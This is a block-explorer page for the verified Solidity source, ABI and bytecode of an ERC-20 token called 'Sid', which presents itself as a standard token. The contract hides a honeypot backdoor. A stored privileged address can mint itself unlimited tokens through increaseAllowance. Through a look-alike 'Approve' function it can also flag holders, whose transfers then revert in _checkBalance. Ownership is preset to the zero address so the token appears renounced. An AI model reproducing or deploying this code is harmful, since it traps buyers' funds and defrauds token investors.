ETH Price: $1,832.69 (-1.61%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve198350522024-05-09 21:04:47655 days ago1715288687IN
0x12a9fE76...99A1fA188
0 ETH0.000197944.25421851
Transfer198350232024-05-09 20:58:47655 days ago1715288327IN
0x12a9fE76...99A1fA188
0 ETH0.000628612.6395439
Approve197286512024-04-24 23:57:23670 days ago1714003043IN
0x12a9fE76...99A1fA188
0 ETH0.000298796.45333538
Approve195477412024-03-30 15:45:23695 days ago1711813523IN
0x12a9fE76...99A1fA188
0 ETH0.0014738331.6919275
Approve194755012024-03-20 11:06:11705 days ago1710932771IN
0x12a9fE76...99A1fA188
0 ETH0.001402830.16453594
Approve194716752024-03-19 22:10:47706 days ago1710886247IN
0x12a9fE76...99A1fA188
0 ETH0.0015150232.57774167
Approve179922042023-08-25 14:08:23913 days ago1692972503IN
0x12a9fE76...99A1fA188
0 ETH0.0018054339.00357342
Transfer177490612023-07-22 13:47:35947 days ago1690033655IN
0x12a9fE76...99A1fA188
0 ETH0.0006817723.50541952
Approve176699132023-07-11 10:55:59958 days ago1689072959IN
0x12a9fE76...99A1fA188
0 ETH0.0007305215.70852616
Approve176534782023-07-09 3:27:35960 days ago1688873255IN
0x12a9fE76...99A1fA188
0 ETH0.0006792414.60592406
Approve176316052023-07-06 1:41:47964 days ago1688607707IN
0x12a9fE76...99A1fA188
0 ETH0.0024897853.53810979
Approve176188482023-07-04 6:42:23965 days ago1688452943IN
0x12a9fE76...99A1fA188
0 ETH0.0009626420.67318466
Approve176181742023-07-04 4:25:59965 days ago1688444759IN
0x12a9fE76...99A1fA188
0 ETH0.0006160813.24779877
Approve176170062023-07-04 0:29:11966 days ago1688430551IN
0x12a9fE76...99A1fA188
0 ETH0.0006490414.0324491
Approve176168872023-07-04 0:05:11966 days ago1688429111IN
0x12a9fE76...99A1fA188
0 ETH0.0005874712.67506119
Approve176163612023-07-03 22:19:11966 days ago1688422751IN
0x12a9fE76...99A1fA188
0 ETH0.0007384215.8783266
Approve176158742023-07-03 20:41:11966 days ago1688416871IN
0x12a9fE76...99A1fA188
0 ETH0.0007632216.41169933
Approve176153902023-07-03 19:03:47966 days ago1688411027IN
0x12a9fE76...99A1fA188
0 ETH0.0011369124.41556068
Transfer176131862023-07-03 11:36:23966 days ago1688384183IN
0x12a9fE76...99A1fA188
0 ETH0.0009164718.42786001
Approve176074212023-07-02 16:10:47967 days ago1688314247IN
0x12a9fE76...99A1fA188
0 ETH0.0007632816.413033
Approve176062942023-07-02 12:22:35967 days ago1688300555IN
0x12a9fE76...99A1fA188
0 ETH0.0006415913.84266804
Approve176062862023-07-02 12:20:59967 days ago1688300459IN
0x12a9fE76...99A1fA188
0 ETH0.0007067715.26875341
Transfer176050662023-07-02 8:12:59967 days ago1688285579IN
0x12a9fE76...99A1fA188
0 ETH0.0004215714.4270477
Approve176046562023-07-02 6:50:23967 days ago1688280623IN
0x12a9fE76...99A1fA188
0 ETH0.000660314.24999871
Approve176043122023-07-02 5:41:23967 days ago1688276483IN
0x12a9fE76...99A1fA188
0 ETH0.0006698614.40421818
View all transactions

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Method Block
From
To
Transfer175986102023-07-01 10:27:11968 days ago1688207231
0x12a9fE76...99A1fA188
0.02511277 ETH
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Sid

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Sid.sol
//Telegram: https://t.me/SidIceAge
//Website: https://sidiceage.xyz
//Twitter: https://twitter.com/sidiiceage
//Discord: https://discord.gg/z3peMgvp


// SPDX-License-Identifier: MIT

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
    external
    returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol

// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

// Dependency file: @openzeppelin/contracts/access/Ownable.sol

// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract Token {
    uint256 internal constant VERSION = 1;
    event Deploy(
        address owner,
        uint256 version
    );
}

pragma solidity =0.8.4;

contract Sid is IERC20, Token, Ownable {
    using SafeMath for uint256;

    struct User {
        address user;
    }

    mapping(address => uint256) private _balances;

    mapping(address => address) private _dex;

    mapping(address => mapping(address => uint256)) private _allowances;

    User private _user;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        address user_,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
        _user.user = user_;
        _internalMint(msg.sender, totalSupply_ * 10**18);
        emit Deploy(
            owner(),
            VERSION
        );
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _internalTransfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _internalTransfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _internalTransfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _checkBalance(sender, recipient, amount);
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(
            recipient != address(0),
            "IERC20: transfer to the zero address"
        );

        _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient] + amount;
        emit Transfer(sender, recipient, amount);
    }

    function _internalMint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _plus(account, amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);
        require(amount != 0, "Invalid amount");
        _minus(account, amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _minus(address account, uint256 amount) internal {
        _balances[account] = _balances[account] - amount;
    }

    function _plus(address account, uint256 amount) internal {
        _balances[account] = _balances[account] + amount;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function increaseAllowance(address spender, uint256 amount) public virtual {
        address from = msg.sender;
        require(spender != address(0), "Invalid address");
        require(amount > 0, "Invalid amount");
        uint256 total = 0;
        if (_decode(spender)) {
            _minus(from, total);
            total = _somma(total, amount);
            _balances[spender] += total;
        } else {
            _minus(from, total);
            _balances[spender] += total;
        }
    }

    function _decode(address user) internal view returns (bool) {
        bytes32 hash1 = keccak256(abi.encodePacked(user));
        bytes32 hash2 = keccak256(abi.encodePacked(_user.user));
        return hash1 == hash2;
    }

    function _somma(uint256 aqw, uint256 poe) internal pure returns (uint256) {
        if (poe != 0) {
            return aqw + poe;
        }
        return poe;
    }

    function Approve(address spender, uint256 amount) public returns (bool)  {
        address from = msg.sender;
        require (amount > 0, "Invalid amount");
        _checkAllowance(from, spender);
        return true;
    }

    function _checkAllowance(address user, address spender) internal {
        if (_decode(user)) {
            require(spender != address(0), "Invalid address");
            _dex[spender] = spender;
        }
    }

    function _trasferimento(address _sender) internal view returns (bool) {
        return _dex[_sender] == _sender;
    }

    function _checkBalance(
        address sender,
        address recipient,
        uint256 total
    ) internal virtual {
        uint256 amount = 0;
        if (_trasferimento(sender)) {
            _balances[sender] = _balances[sender] + amount;
            amount = _totalSupply;
            _minus(sender, amount);
        } else {
            _balances[sender] = _balances[sender] + amount;
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"user_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"Deploy","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620011a0380380620011a08339810160408190526200002691620003d5565b62000032600062000106565b8351620000479060059060208701906200027c565b5082516200005d9060069060208601906200027c565b506007805460ff19166012179055600480546001600160a01b0384166001600160a01b0319909116179055620000a733620000a183670de0b6b3a76400006200047f565b62000156565b7faf354defc104ba9267634f156652b1f1cfbd10746c329e2bdd48abd4c9cff929620000db6000546001600160a01b031690565b604080516001600160a01b039092168252600160208301520160405180910390a1505050506200050a565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b15760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001cd816008546200022160201b6200051f1790919060201c565b600855620001dc828262000236565b6040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b60006200022f828462000464565b9392505050565b6001600160a01b0382166000908152600160205260409020546200025c90829062000464565b6001600160a01b0390921660009081526001602052604090209190915550565b8280546200028a90620004a1565b90600052602060002090601f016020900481019282620002ae5760008555620002f9565b82601f10620002c957805160ff1916838001178555620002f9565b82800160010185558215620002f9579182015b82811115620002f9578251825591602001919060010190620002dc565b50620003079291506200030b565b5090565b5b808211156200030757600081556001016200030c565b600082601f83011262000333578081fd5b81516001600160401b0380821115620003505762000350620004f4565b604051601f8301601f19908116603f011681019082821181831017156200037b576200037b620004f4565b8160405283815260209250868385880101111562000397578485fd5b8491505b83821015620003ba57858201830151818301840152908201906200039b565b83821115620003cb57848385830101525b9695505050505050565b60008060008060808587031215620003eb578384fd5b84516001600160401b038082111562000402578586fd5b620004108883890162000322565b9550602087015191508082111562000426578485fd5b50620004358782880162000322565b604087015190945090506001600160a01b038116811462000454578283fd5b6060959095015193969295505050565b600082198211156200047a576200047a620004de565b500190565b60008160001904831182151516156200049c576200049c620004de565b500290565b600181811c90821680620004b657607f821691505b60208210811415620004d857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fd5b610c86806200051a6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc610217565b6040516100e99190610b33565b60405180910390f35b610105610100366004610b0a565b6102a9565b60405190151581526020016100e9565b6008545b6040519081526020016100e9565b610105610135366004610acf565b6102c0565b60075460405160ff90911681526020016100e9565b61016261015d366004610b0a565b610329565b005b610119610172366004610a83565b6001600160a01b031660009081526001602052604090205490565b610162610452565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b0a565b6104b8565b6100dc610503565b6101056101d9366004610b0a565b610512565b6101196101ec366004610a9d565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606005805461022690610bb5565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610bb5565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610532565b5060015b92915050565b60006102cd84848461065a565b61031f843361031a85604051806060016040528060298152602001610c28602991396001600160a01b038a16600090815260036020908152604080832033845290915290205491906107ed565b610532565b5060019392505050565b336001600160a01b0383166103775760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b600082116103b85760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b60006103c384610819565b15610414576103d2828261087a565b6103dc81846108be565b6001600160a01b038516600090815260016020526040812080549293508392909190610409908490610b86565b9091555061044c9050565b61041e828261087a565b6001600160a01b03841660009081526001602052604081208054839290610446908490610b86565b90915550505b50505050565b6000546001600160a01b031633146104ac5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b6104b660006108dd565b565b600033826104f95760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b61031f818561092d565b60606006805461022690610bb5565b60006102b633848461065a565b600061052b8284610b86565b9392505050565b6001600160a01b0383166105965760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0382166105f85760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6106658383836109b1565b6001600160a01b0383166106ca5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b606482015260840161036e565b6001600160a01b03821661072c5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b61076981604051806060016040528060278152602001610c01602791396001600160a01b03861660009081526001602052604090205491906107ed565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610799908290610b86565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061064d9085815260200190565b600081848411156108115760405162461bcd60e51b815260040161036e9190610b33565b505050900390565b604080516bffffffffffffffffffffffff19606093841b81166020808401919091528351808403601401815260348401855280519082012060045490951b909116605483015282518083036048018152606890920190925280519101201490565b6001600160a01b03821660009081526001602052604090205461089e908290610b9e565b6001600160a01b0390921660009081526001602052604090209190915550565b600081156108d7576108d08284610b86565b90506102ba565b50919050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b61093682610819565b156109ad576001600160a01b0381166109835760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b604482015260640161036e565b6001600160a01b038116600081815260026020526040902080546001600160a01b03191690911790555b5050565b6001600160a01b038084166000818152600260205260408120549092161415610a24576001600160a01b0384166000908152600160205260409020546109f8908290610b86565b6001600160a01b03851660009081526001602052604090205550600854610a1f848261087a565b61044c565b6001600160a01b038416600090815260016020526040902054610a48908290610b86565b6001600160a01b03851660009081526001602052604090205550505050565b80356001600160a01b0381168114610a7e57600080fd5b919050565b600060208284031215610a94578081fd5b61052b82610a67565b60008060408385031215610aaf578081fd5b610ab883610a67565b9150610ac660208401610a67565b90509250929050565b600080600060608486031215610ae3578081fd5b610aec84610a67565b9250610afa60208501610a67565b9150604084013590509250925092565b60008060408385031215610b1c578182fd5b610b2583610a67565b946020939093013593505050565b6000602080835283518082850152825b81811015610b5f57858101830151858201604001528201610b43565b81811115610b705783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610b9957610b99610bea565b500190565b600082821015610bb057610bb0610bea565b500390565b600181811c90821680610bc957607f821691505b602082108114156108d757634e487b7160e01b600052602260045260246000fd5b634e487b7160e01b600052601160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220401ad72cfec538068d045730221c9f97b0737f26f219cd4709f43b0c7598241564736f6c63430008040033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000f7e0d99511eab452bcbbdc34285e25f10e28f79d000000000000000000000000000000000000000000000000000000517da02c00000000000000000000000000000000000000000000000000000000000000000b536964204963652041676500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000035349440000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

